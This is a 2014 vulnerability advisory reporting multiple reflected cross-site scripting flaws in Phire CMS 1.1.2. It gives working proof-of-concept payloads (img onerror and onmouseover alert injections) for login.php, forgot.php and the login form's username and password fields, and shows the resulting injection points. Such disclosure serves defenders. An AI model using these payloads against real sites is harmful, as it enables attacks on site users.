Phire CMS 1.1.2 Multiple XSS

2014.01.25

Credit: Smash_

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Title: Phire CMS 1.1.2 - Multiple XSS
#Vendor: phirecms.org - en.wikipedia.org/wiki/Phire_CMS
#Version: 1.1.2 (Latest ATM)
#Demo: demo.phirecms.org
#Date: 01.25.2014
#Contact: smash[at]devilteam.org

1. Cross Site Scripting

a) login.php

Request:
host/phire/login.php/666"><img%20src%3d666%20onerror%3dalert(666)>

Injection point:
<form action="/phire/login.php/666"><img src=666 onerror=alert(666)>" 

PoC:
phirecms.org/phire/login.php/666"><img%20src%3d666%20onerror%3dalert(666)> (...)

b) forgot.php

Request:
host/phire/forgot.php/666"><img%20src%3d666%20onerror%3dalert(666)>

Same as above.

c) POST - username & password

Request:
POST /phire/login.php HTTP/1.1
Host: demo.phirecms.org

username=666" onmouseover=alert(666) bad="0&password=777" onmouseover=alert(777) bad="&submit=LOGIN

Injection point:
  <input type="text" name="username" id="username" value="666\" onmouseover=alert(666) bad=\"0" style="width: 220px;" size="35" />
    (...)
  <input type="password" name="password" id="password" value="777\" onmouseover=alert(777) bad=\"" style="width: 220px;" size="35" />

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Phire CMS 1.1.2 Multiple XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.